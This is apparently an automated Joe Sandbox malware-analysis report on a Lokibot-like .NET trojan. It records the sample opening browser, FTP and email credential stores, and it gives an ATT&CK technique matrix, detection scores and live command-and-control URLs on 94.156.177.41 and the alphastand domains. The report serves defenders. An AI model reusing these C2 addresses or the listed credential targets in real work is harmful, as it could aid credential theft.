            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7524, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7716, type: MEMORYSTR
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 00000003.00000002.3131214970.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: PopPassword3_2_0040D069
            Source: C:\Users\user\Desktop\file.exeCode function: SmtpPassword3_2_0040D069
            Source: Yara matchFile source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            2
            OS Credential Dumping
            11
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
            Process Injection
            11
            Disable or Modify Tools
            2
            Credentials in Registry
            1
            Process Discovery
            Remote Desktop Protocol1
            Archive Collected Data
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager31
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares2
            Data from Local System
            2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture112
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials13
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            file.exe71%ReversingLabsByteCode-MSIL.Trojan.Taskun
            file.exe100%AviraHEUR/AGEN.1306899
            file.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://94.156.177.41/maxzi/five/fre.php100%Avira URL Cloudmalware
            94.156.177.41/maxzi/five/fre.php100%Avira URL Cloudmalware
            No contacted domains info
            NameMaliciousAntivirus DetectionReputation
            http://kbfvzoboss.bid/alien/fre.phpfalse
              high
              http://94.156.177.41/maxzi/five/fre.phptrue
              • Avira URL Cloud: malware
              unknown
              http://alphastand.top/alien/fre.phpfalse
                high
                http://alphastand.win/alien/fre.phpfalse
                  high
                  http://alphastand.trade/alien/fre.phpfalse
                    high
                    94.156.177.41/maxzi/five/fre.phptrue
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.apache.org/licenses/LICENSE-2.0file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.fontbureau.comfile.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.fontbureau.com/designersGfile.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.fontbureau.com/designers/?file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.founder.com.cn/cn/bThefile.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.com/designers?file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.ibsensoftware.com/file.exe, file.exe, 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                  high
                                  http://www.tiro.comfile.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designersfile.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.goodfont.co.krfile.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.carterandcone.comlfile.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.sajatypeworks.comfile.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.typography.netDfile.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.fontbureau.com/designers/cabarga.htmlNfile.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.founder.com.cn/cn/cThefile.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.galapagosdesign.com/staff/dennis.htmfile.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.founder.com.cn/cnfile.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.fontbureau.com/designers/frere-user.htmlfile.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.jiyu-kobo.co.jp/file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.galapagosdesign.com/DPleasefile.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.fontbureau.com/designers8file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.fonts.comfile.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.sandoll.co.krfile.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.urwpp.deDPleasefile.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.zhongyicts.com.cnfile.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.sakkal.comfile.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          94.156.177.41
                                                                          unknownBulgaria
                                                                          43561NET1-ASBGtrue
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1561052
                                                                          Start date and time:2024-11-22 17:37:05 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 5m 39s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:10
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:file.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@7/8@0/1
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 65
                                                                          • Number of non-executed functions: 11
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • VT rate limit hit for: file.exe
                                                                          TimeTypeDescription
                                                                          11:38:16API Interceptor69x Sleep call for process: file.exe modified
                                                                          11:38:19API Interceptor16x Sleep call for process: powershell.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          94.156.177.41Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                          • 94.156.177.41/simple/five/fre.php
                                                                          stthigns.docGet hashmaliciousLokibotBrowse
                                                                          • 94.156.177.41/maxzi/five/fre.php
                                                                          goodtoseeuthatgreatthingswithentirethingsgreatfor.htaGet hashmaliciousCobalt Strike, LokibotBrowse
                                                                          • 94.156.177.41/maxzi/five/fre.php
                                                                          PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                          • 94.156.177.41/maxzi/five/fre.php
                                                                          ECxDwGGFH3.exeGet hashmaliciousLokibotBrowse
                                                                          • 94.156.177.41/simple/five/fre.php
                                                                          greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                          • 94.156.177.41/simple/five/fre.php
                                                                          Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                          • 94.156.177.41/simple/five/fre.php
                                                                          No context
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          NET1-ASBGfilepdf.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                          • 94.156.177.166
                                                                          putty .exeGet hashmaliciousDarkTortilla, SmokeLoaderBrowse
                                                                          • 94.156.177.166
                                                                          2.ps1Get hashmaliciousUnknownBrowse
                                                                          • 94.156.177.166
                                                                          Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                          • 94.156.177.41
                                                                          stthigns.docGet hashmaliciousLokibotBrowse
                                                                          • 94.156.177.41
                                                                          goodtoseeuthatgreatthingswithentirethingsgreatfor.htaGet hashmaliciousCobalt Strike, LokibotBrowse
                                                                          • 94.156.177.41
                                                                          PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                          • 94.156.177.41
                                                                          ECxDwGGFH3.exeGet hashmaliciousLokibotBrowse
                                                                          • 94.156.177.41
                                                                          greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                          • 94.156.177.41
                                                                          Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                          • 94.156.177.41
                                                                          No context
                                                                          No context
                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1216
                                                                          Entropy (8bit):5.34331486778365
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                          Malicious:true
                                                                          Reputation:high, very likely benign file
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):2232
                                                                          Entropy (8bit):5.379736180876081
                                                                          Encrypted:false
                                                                          SSDEEP:48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZeUyus:tLHyIFKL3IZ2KRH9Ougos
                                                                          MD5:9D384A9EBEABB083763926A2E63505A6
                                                                          SHA1:3AB2DD8F7518A36D7E22EFD76FF25F3DFA25D889
                                                                          SHA-256:801BC488523F40135A2F58EE86844AD3AFD2EFD0AF5DD0F7DE40978E7EDE92DD
                                                                          SHA-512:03941519E7F748E7A151CDEFC2E6D98A19B2E077AB09C48822B3882D8BA39C8427A9766C26B3F28DB419385FD7F030C3A7D5FE5ADE4F796AE876921042F5FED9
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview:1
                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                          File Type:data
                                                                          Category:modified
